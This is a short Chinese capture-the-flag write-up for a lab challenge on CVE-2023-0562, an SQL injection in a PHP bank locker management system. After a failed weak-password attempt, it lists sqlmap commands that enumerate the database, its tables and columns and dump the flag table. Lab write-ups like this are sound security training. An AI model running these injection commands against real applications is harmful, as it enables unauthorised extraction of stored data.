春秋云境CVE-2023-0562

简介

银行储物柜管理系统是一个基于网络的应用程序,用于处理存储银行客户贵重物品的银行储物柜。储物柜的所有详细信息都保存在数据库中。银行储物柜管理系统项目是使用 PHP 和 MySQLi 扩展开发的。

正文

进入靶场,首先就看到有个bankers,点进去一看发现是个登录界面,那么我就开始尝试弱口令爆破发现没用,然后修改密码,需要邮箱和电话,恰好在主页有邮箱和电话,我尝试输入进去,然后发现这根本就是一个陷阱,没有用。

找到注入点

发现这里有个输入的地方,随便输入进去发现是个查询功能,那么就可能存在sql注入,那就话不多说,抓包上sqlmap

开始抓包

sqlmap开爆

python sqlmap.py -r 2.txt -batch -dbs

python sqlmap.py -r 2.txt -batch -D blmsdb -tables

>python sqlmap.py -r 2.txt -batch -D blmsdb -T fllllaaaag -columns

拿下靶场

python sqlmap.py -r 2.txt -batch -D blmsdb -T fllllaaaag -C flag -dump

相关推荐
元智启1 小时前
企业AI应用从“能用”到“可信”:智能体评估体系与安全治理实战指南
人工智能·安全
广州创科水利1 小时前
广州创科助力福建洋柄水库大桥打造全天候安全“天眼”
安全
能年玲奈喝榴莲牛奶2 小时前
网络安全服务-网络安全检查
安全·web安全·网络安全·安全服务
韩明君2 小时前
OpenClaw安全部署实现
linux·人工智能·安全·debian·本地部署·ai agent·openclaw
铭彩色2 小时前
refresh token(保证access token获取及用户安全)
java·安全
至顶科技2 小时前
微软加速量子安全密码学算法集成进程
安全·microsoft·密码学
钟智强2 小时前
国内环境Ollama安装与DeepSeek-R1:1.5b部署全攻略
安全·web安全·网络安全·ollama·deepseek
胡志辉2 小时前
前端反调试:常见套路、识别方法与绕过思路
前端·安全
代码飞一会儿2 小时前
CTF之信息泄漏——你什么都没说但什么都告诉了我
安全
上海云盾-小余2 小时前
出海业务安全架构搭建:跨境云主机合规部署与全域抗攻击策略
安全·安全架构